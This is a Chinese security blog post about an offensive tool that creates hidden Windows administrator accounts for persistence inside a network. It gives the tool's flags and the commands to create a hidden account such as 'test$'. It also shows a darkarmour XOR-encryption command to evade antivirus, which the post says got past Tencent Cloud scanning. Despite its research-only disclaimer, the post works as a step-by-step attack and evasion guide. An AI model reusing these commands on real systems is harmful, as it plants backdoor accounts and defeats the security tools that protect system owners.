声明
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
0x01 工具介绍
0x02 下载
0x03 帮助信息
-
-c 检查当前系统的隐藏账户 -
-cu 设置要克隆的用户,默认 Administrator 用户 -
-d 指定要删除的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $ -
-oc 只创建隐藏用户,不对注册表进行操作,避免被杀软拦截 -
-p 指定添加的用户的密码 -
-u 指定要添加的用户名,如果添加的用户名不是以 $ 结尾,则工具会自动在用户名后添加上 $ -
-v 查看当前工具版本
0x04 内网实战
CreateHiddenAccount_upx_v0.2.exe -h //判断该工具是否可以执行
CreateHiddenAccount_upx_v0.2.exe -u test -p test //创建隐藏账户test$ 密码test
CreateHiddenAccount_upx_v0.2.exe -c //检查当前系统创建的隐藏账号
CreateHiddenAccount_upx_v0.2.exe -d test账户成功被删除。
该工具可结合免杀方式进行内网环境中测试。以下是免杀处理过程:
未作免杀前在线病毒样本检测结果。
sudo python3darkarmour.py -f /home/kali/下载/darkarmour/CreateHiddenAccount_v0.2.exe --encrypt xor --jmp -o/home/kali/下载/darkarmour/demo.exe--loop 5
免杀处理后成功绕腾讯云查杀,下面是腾讯云查杀检测结果:
0x05 总结
0x06 参考
-
https://github.com/wgpsec/CreateHiddenAccount
-
https://github.com/bats3c/darkarmour
▇ 扫码关注我们 ▇
长白山攻防实验室
学习最新技术知识
原文始发于微信公众号(长白山攻防实验室):内网攻防之一键创建隐藏账号
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论